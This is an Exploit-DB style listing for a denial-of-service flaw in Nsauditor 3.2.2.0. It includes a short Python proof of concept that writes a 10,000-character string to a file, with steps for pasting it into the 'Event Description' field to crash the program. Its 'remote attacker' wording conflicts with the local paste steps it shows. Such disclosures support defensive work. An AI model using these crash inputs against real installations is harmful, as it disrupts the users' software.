Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC)

vendor:

Nsauditor

by:

Ismael Nava

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: Nsauditor

Affected Version From: 3.2.2.0

Affected Version To: 3.2.2.0

Patch Exists: NO

Related CWE: N/A

CPE: a:nsauditor:nsauditor

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10 Home x64

2021

Nsauditor 3.2.2.0 – ‘Event Description’ Denial of Service (PoC)

Nsauditor 3.2.2.0 is vulnerable to a denial of service attack when a malicious user sends a large amount of data to the 'Event Description' field. This can be exploited by a remote attacker to crash the application.

Mitigation:

Ensure that the application is configured to limit the size of data that can be sent to the 'Event Description' field.

Source

Exploit-DB raw data:

# Exploit Title: Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC)
# Date: 2021-02-15
# Exploit Author: Ismael Nava
# Vendor Homepage: https://www.nsauditor.com/
# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
# Version: 3.2.2.0
# Tested on: Windows 10 Home x64


#STEPS
# Open the program Nsauditor
# In Options select Configuration...
# Click in Security Events 
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Liella.txt"
# Paste the content in the field Event Description and click in Add Event
# End :)


buffer = 'U' * 10000

try: 
    file = open("Liella.txt","w")
    file.write(buffer)
    file.close()

    print("Archive ready")
except:
    print("Archive no ready")